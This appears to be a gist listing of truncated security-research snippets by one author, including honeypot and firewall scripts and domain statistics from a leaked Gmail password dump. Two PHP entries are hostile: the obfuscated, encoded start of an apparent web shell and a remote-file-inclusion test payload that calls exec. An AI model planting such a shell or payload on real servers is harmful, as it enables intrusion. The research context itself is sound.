felmoltor

#!/bin/bash

if [[ ! -f $1 || $# -ne 2 ]];then
    echo "Usage: $0 <file> <resultfile>"
else
    resultfile=$2
    echo -n "" > $resultfile
    for line in `cat $1`; do
        line=$(echo $line | tr -d ' ')
        if [[ $(echo $line | grep "-"| wc -l) > 0 ]];then

felmoltor

####################################################
# List all the files recursively under a directory #
####################################################
 
def ls_r_files(path)
  path.gsub!(/\/+$/,"")
  if path[-2,2] != "/." and path[-2,3] != "/.."
    if File.directory?(path)
      fentries = []
      entries = Dir.entries(path)

felmoltor

Top domains leaked in 5M password dump of Gmail accounts. Mainly gmail.com and yandex.ru, another similar domains that seems like bug in the phishing or keylogger program:

4800946 gmail.com
 123213 yandex.ru
    608 gmail.com777
    338 gmail.com.vn
    256 gmail.com.br
    238 gmail.com.au
    188 gmail.com7777
    174 gmail.com.com

felmoltor

--------------------
---- 1º Million ----
--------------------

Analyzing a file with user, passwords and separator ':'
Loading the whole dump file. Be patient...
Spliting the dump information...
Analycing the password frecuency...
Analycing the domains frecuency...
Analycing passwords complexity...

felmoltor

--------------
- 1º Million -
--------------

________________ __________         ____    _______   
\_   _____/  _  \\______   \ ___  _/_   |   \   _  \  
 |    __)/  /_\  \|     ___/ \  \/ /|   |   /  /_\  \ 
 |    | /    |    \    |      \   / |   |   \  \_/   \
 \__  | \____|__  /____|       \_/  |___| /\ \_____  /
    \/          \/                        \/       \/ 

felmoltor

Keybase proof

I hereby claim:

• I am felmoltor on github.
• I am felmoltor (https://keybase.io/felmoltor) on keybase.
• I have a public key whose fingerprint is 1485 9C64 36C5 CA4F 236B C04A 990A 3B4D BB7C FB45

To claim this, I am signing this object:

felmoltor

#!/bin/bash

# Author: Felipe Molina (@felmoltor)
# Date: January 2015
# Purpose: This scripts checks for new binaries captured by kippo and send an email when an attacker drops a new one

#############################

LASTLS='lastls.txt'
CURRENTLS='currentls.txt'

felmoltor

<?php
$language = 'eng';
$auth     = 0;
$name     = ''; // md5 Login
$pass     = ''; // md5 Password
/**************************************************************************************************************************************************************/
error_reporting(0);
$rhs = '7b17e9pVsjj89+Rs8h0UHZ8BJhgjLr4Gj++OnfgS3+I4yW4FEqAYECOBejKb97O/SNXdResK2M7u7P7GuxOgu7q6urqquvpNpuPYQd0xB7YztPrteTG39vLFhtW3IM0d2o6ZSF29ctZ7tm6q0Tx7YPbrDd01DctERorWrX6zO4LPVmPmg9lZADIsSmJnzW141GIOLbvvxsDo3a59Xx853W0LVvMhXGaYzZjU2K7dzuSPL9+/D3NPZZ0A3FmeuDA30IcdpabM1c9qz65pzz50aUG2L49pjy/qdCcnF5mvhcxPpoDlHgrDh24Gi0uDQIGz3aOTi9365s7OTObrmrKwYA0AqOHY967pBCDfXlyc1i/hSn1mH3dg0BwQikCLT4g/XO6eX9Qvzw4YKAAAmKGPAczQh3M243FlmAFWkKE3h2qE4PTk/OJmptkzSzH9aXXdTFDdBZim3R+a/SGAqS9fvHyxo49/+XJImSMEB6f0Hcnfb1HRYo/AWKdYCVHGe90dKttpr6f3DVnEyl++qP+MPxWZDswHoqnDs9R2bEh/Wl3fumos4AVP5BXRQMp1aXqXcuBCq5XNvtoQggVPdblQN5tO2XWbw1kup/zzn1dpg//Oc3Gxz+SUSjWF5CkEFSv9Emvu5Ys/lTkZFzRQW0Z+KHPXNZV1XhHygNqF3/7SfwsvXxhzy+qjXg9odDi0baaa3wCW9KymcOPPeQ65DndK7+l6q0z/cH

felmoltor

<?php
	// echo "Testing RFI success!";
	$e = '';
	exec("touch ./bbbbbbbb.txt",$e);
?>

felmoltor

#!/bin/bash

# Close the remaining firewall rules opened for users that no longer are connected by SSH
# It deletes the iptables rules execpt the ssh (port 22) and all the local connections
# Save this script and execute it as root with a crontab every 5 minutes.

# Example output of iptables -L -n:
# ACCEPT     tcp  --  11.22.33.44          0.0.0.0/0            tcp dpt:80
# ACCEPT     tcp  --  11.22.33.44          0.0.0.0/0            tcp dpt:443